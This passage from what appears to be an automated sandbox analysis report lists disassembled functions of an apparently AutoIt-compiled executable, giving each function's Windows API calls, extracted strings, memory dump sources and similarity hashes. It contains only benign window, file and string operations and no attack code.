                                                                                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 003DFA0D
                                                                                                                      • GetClientRect.USER32(?,?), ref: 003DFA1A
                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 003DFA3F
                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 003DFA6A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3869813825-2594219639
                                                                                                                      • Opcode ID: c84677b5d8aa37c8832c92965044b6be1cf7897eb5ce9542a580b4c76a10f5c9
                                                                                                                      • Instruction ID: a18a96f945d5f869d40c7be98c397a3a6690373aaca5c624230ad36ff27c5581
                                                                                                                      • Opcode Fuzzy Hash: c84677b5d8aa37c8832c92965044b6be1cf7897eb5ce9542a580b4c76a10f5c9
                                                                                                                      • Instruction Fuzzy Hash: B5517B71E00709AFDB219FA8DD89F6EBBF5FF04704F004929E686A26A0C774A945CF04
                                                                                                                      Function 004069C5 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 281windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00406A52
                                                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00406B12
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                      • String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                      • API String ID: 3974292440-1753161424
                                                                                                                      • Opcode ID: 3133871b6c441ce3f4fd9c9c5ab6c999caf9cb8dcb2dfc787042d4dfa74b9825
                                                                                                                      • Instruction ID: b4939b489a65a688422b1c7029129c7b3c5072c7177f87ba16c15eb2649e696f
                                                                                                                      • Opcode Fuzzy Hash: 3133871b6c441ce3f4fd9c9c5ab6c999caf9cb8dcb2dfc787042d4dfa74b9825
                                                                                                                      • Instruction Fuzzy Hash: E7A1A6702142019FCB05EF24C851A6AB7A5FF85318F15993EB896AF3D2DB34EC16CB46
                                                                                                                      Function 0040E541 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 129filecommemoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0040E564
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040E57B
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0040E586
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E593
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040E59C
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040E5AB
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040E5B4
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E5BB
                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0040E5CC
                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,0042D9BC,?), ref: 0040E5E5
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040E5F5
                                                                                                                      • GetObjectW.GDI32(?,00000018,000000FF), ref: 0040E619
                                                                                                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0040E644
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040E66C
                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0040E682
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3840717409-2594219639
                                                                                                                      • Opcode ID: d427119b61e4fb96caf42401cba475e8f9868cc9104ef5168cff8c0036b6689b
                                                                                                                      • Instruction ID: f64484fd038e08cf132c155dbe129a300ab190eee0633162eae5e1e76fd26d40
                                                                                                                      • Opcode Fuzzy Hash: d427119b61e4fb96caf42401cba475e8f9868cc9104ef5168cff8c0036b6689b
                                                                                                                      • Instruction Fuzzy Hash: 81418E75A00204FFCB219F65DC48EAB7BB8EF49711F504469F906E72A0D7359D12CB28
                                                                                                                      Function 003DE69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 003DE6E1
                                                                                                                      • _wcscmp.LIBCMT ref: 003DE6F2
                                                                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 003DE71A
                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 003DE737
                                                                                                                      • _wcscmp.LIBCMT ref: 003DE755
                                                                                                                      • _wcsstr.LIBCMT ref: 003DE766
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 003DE79E
                                                                                                                      • _wcscmp.LIBCMT ref: 003DE7AE
                                                                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 003DE7D5
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 003DE81E
                                                                                                                      • _wcscmp.LIBCMT ref: 003DE82E
                                                                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 003DE856
                                                                                                                      • GetWindowRect.USER32(00000004,?), ref: 003DE8BF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                      • String ID: @$ThumbnailClass
                                                                                                                      • API String ID: 1788623398-1539354611
                                                                                                                      • Opcode ID: 76e61d58c280efe03f84665cce7f417f65d316aa9d3702b97c19d2ba22a91548
                                                                                                                      • Instruction ID: 8146c73a06e1dfeadc829b02f789fb0a65955fae1ad889f1a52dfe5f274133aa
                                                                                                                      • Opcode Fuzzy Hash: 76e61d58c280efe03f84665cce7f417f65d316aa9d3702b97c19d2ba22a91548
                                                                                                                      • Instruction Fuzzy Hash: 0281A0321082059BDB16EF10E885FAA7BE8FF44714F14846BFD899E192DB34DD46CBA1
                                                                                                                      Function 0040CC68 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0040CD0B
                                                                                                                      • DestroyWindow.USER32(00000000,?), ref: 0040CD83
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0040CE04
                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0040CE26
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0040CE35
                                                                                                                      • DestroyWindow.USER32(?), ref: 0040CE52
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,003A0000,00000000), ref: 0040CE85
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0040CEA4
                                                                                                                      • GetDesktopWindow.USER32 ref: 0040CEB9
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0040CEC0
                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0040CED2
                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0040CEEA
                                                                                                                        • Part of subcall function 003BB155: GetWindowLongW.USER32(?,000000EB), ref: 003BB166
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                      • String ID: 0$@U=u$tooltips_class32
                                                                                                                      • API String ID: 1297703922-1130792468
                                                                                                                      • Opcode ID: 86e7854bad7c5eb288f106af37495c2a8a35d2a0be6095dcde4278b6332fcde3
                                                                                                                      • Instruction ID: 184f8a9766c5f8314b6be88ca35d6a60600e19297864780e3d1dcb3697bd8cc3
                                                                                                                      • Opcode Fuzzy Hash: 86e7854bad7c5eb288f106af37495c2a8a35d2a0be6095dcde4278b6332fcde3
                                                                                                                      • Instruction Fuzzy Hash: FE71CF71240305EFD721CF28CC85FAB37E5EB89704F540529F985A72A1D774E802DB5A
                                                                                                                      Function 003DE4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                      • API String ID: 1038674560-1810252412
                                                                                                                      • Opcode ID: 2b59820f7e7138e6c2726a638fce3de89c90446fdb1a552f88d2df06d26f7716
                                                                                                                      • Instruction ID: 5b9e15de030090c1c31669d46565062d6545d98ce971d930435cc170b84456b6
                                                                                                                      • Opcode Fuzzy Hash: 2b59820f7e7138e6c2726a638fce3de89c90446fdb1a552f88d2df06d26f7716
                                                                                                                      • Instruction Fuzzy Hash: 7931CD32904205A6DA17FB50EE53FAE77A99B13B45B30012BF841B91D7EB91AF08C615
                                                                                                                      Function 00406F67 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 244windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00406FF9
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00407044
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                      • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                      • API String ID: 3974292440-383632319
                                                                                                                      • Opcode ID: aae1679fad45f8705b84cd2da3cc354e7bb04dfb73849ac7676eb3c4eacd3c6d
                                                                                                                      • Instruction ID: 8fa818c29c8abff3d26ed23da5479edc1ac1d435e6d1875830149a9514f09da5
                                                                                                                      • Opcode Fuzzy Hash: aae1679fad45f8705b84cd2da3cc354e7bb04dfb73849ac7676eb3c4eacd3c6d
                                                                                                                      • Instruction Fuzzy Hash: A391B2746042019FCB15EF14C851AAAB7A2EF88354F04886EF8956F7D2DB34FD4ACB46
                                                                                                                      Function 003F01E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _wcscpy.LIBCMT ref: 003F026A
                                                                                                                      • _wcschr.LIBCMT ref: 003F0278
                                                                                                                      • _wcscpy.LIBCMT ref: 003F028F
                                                                                                                      • _wcscat.LIBCMT ref: 003F029E
                                                                                                                      • _wcscat.LIBCMT ref: 003F02BC
                                                                                                                      • _wcscpy.LIBCMT ref: 003F02DD
                                                                                                                      • __wsplitpath.LIBCMT ref: 003F03BA
                                                                                                                      • _wcscpy.LIBCMT ref: 003F03DF
                                                                                                                      • _wcscpy.LIBCMT ref: 003F03F1
                                                                                                                      • _wcscpy.LIBCMT ref: 003F0406
                                                                                                                      • _wcscat.LIBCMT ref: 003F041B
                                                                                                                      • _wcscat.LIBCMT ref: 003F042D
                                                                                                                      • _wcscat.LIBCMT ref: 003F0442
                                                                                                                        • Part of subcall function 003EC890: _wcscmp.LIBCMT ref: 003EC92A
                                                                                                                        • Part of subcall function 003EC890: __wsplitpath.LIBCMT ref: 003EC96F
                                                                                                                        • Part of subcall function 003EC890: _wcscpy.LIBCMT ref: 003EC982
                                                                                                                        • Part of subcall function 003EC890: _wcscat.LIBCMT ref: 003EC995
                                                                                                                        • Part of subcall function 003EC890: __wsplitpath.LIBCMT ref: 003EC9BA
                                                                                                                        • Part of subcall function 003EC890: _wcscat.LIBCMT ref: 003EC9D0
                                                                                                                        • Part of subcall function 003EC890: _wcscat.LIBCMT ref: 003EC9E3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                      • API String ID: 2955681530-2806939583
                                                                                                                      • Opcode ID: 0a08f0b65ec8ec7340dccbfb5171fa13992879c7d8f6f4cd0a8e49f03cea77a7
                                                                                                                      • Instruction ID: 2d3d68e8ad834e3fb59a33d39366a7a0e136004e4822e471beb6e138458fb0ee
                                                                                                                      • Opcode Fuzzy Hash: 0a08f0b65ec8ec7340dccbfb5171fa13992879c7d8f6f4cd0a8e49f03cea77a7
                                                                                                                      • Instruction Fuzzy Hash: 7F91C571504705AFDB26EB54C951FABB3E8EF45310F00485EF6459B252EB34EE44CB92
                                                                                                                      Function 0040E305 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 199windowlibraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0040E3BB
                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00409615,?), ref: 0040E417
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0040E457
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0040E49C
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0040E4D3
                                                                                                                      • FreeLibrary.KERNEL32(?,00000004,?,?,?,00409615,?), ref: 0040E4DF
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0040E4EF
                                                                                                                      • DestroyCursor.USER32(?), ref: 0040E4FE
                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0040E51B
                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0040E527
                                                                                                                        • Part of subcall function 003C1BC7: __wcsicmp_l.LIBCMT ref: 003C1C50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                      • String ID: .dll$.exe$.icl$@U=u
                                                                                                                      • API String ID: 3907162815-1639919054
                                                                                                                      • Opcode ID: fe57c903147e29d96215565176d6719fb07702cd460a097dd723957a95f999d3
                                                                                                                      • Instruction ID: 5151a086b3a8b03fac05a1cf4a6d464465fa81acad0696e379f3624a83fec7a8
                                                                                                                      • Opcode Fuzzy Hash: fe57c903147e29d96215565176d6719fb07702cd460a097dd723957a95f999d3
                                                                                                                      • Instruction Fuzzy Hash: CD61F171A00214BFEB20DF65CC45FAA7BA8AB09710F104526F911EB1D1DB78ED90D764
                                                                                                                      Function 003EB428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 003EB46D
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 003EB476
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003EB482
                                                                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 003EB561
                                                                                                                      • __swprintf.LIBCMT ref: 003EB591
                                                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 003EB5BD
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003EB63F
                                                                                                                      • SysFreeString.OLEAUT32(00000016), ref: 003EB6D1
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003EB727
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003EB736
                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 003EB772
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                      • API String ID: 3730832054-3931177956
                                                                                                                      • Opcode ID: f64da0431094d342997f3f374c15b26f80ec7669e23bde83ef33858956519643
                                                                                                                      • Instruction ID: f72d547a204f704773db24c2fb2eb1f30b6054b6caba59d83ce8a84f1628b520
                                                                                                                      • Opcode Fuzzy Hash: f64da0431094d342997f3f374c15b26f80ec7669e23bde83ef33858956519643
                                                                                                                      • Instruction Fuzzy Hash: 17C1C171A04666DBCB139F6BD484B6AF7B8FF05300F258665E4059BAC2CB74EC40DBA1
                                                                                                                      Function 003F0E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 003F0EFF
                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 003F0F0F
                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003F0F1B
                                                                                                                      • __wsplitpath.LIBCMT ref: 003F0F79
                                                                                                                      • _wcscat.LIBCMT ref: 003F0F91
                                                                                                                      • _wcscat.LIBCMT ref: 003F0FA3
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 003F0FB8
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003F0FCC
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003F0FFE
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003F101F
                                                                                                                      • _wcscpy.LIBCMT ref: 003F102B
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003F106A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
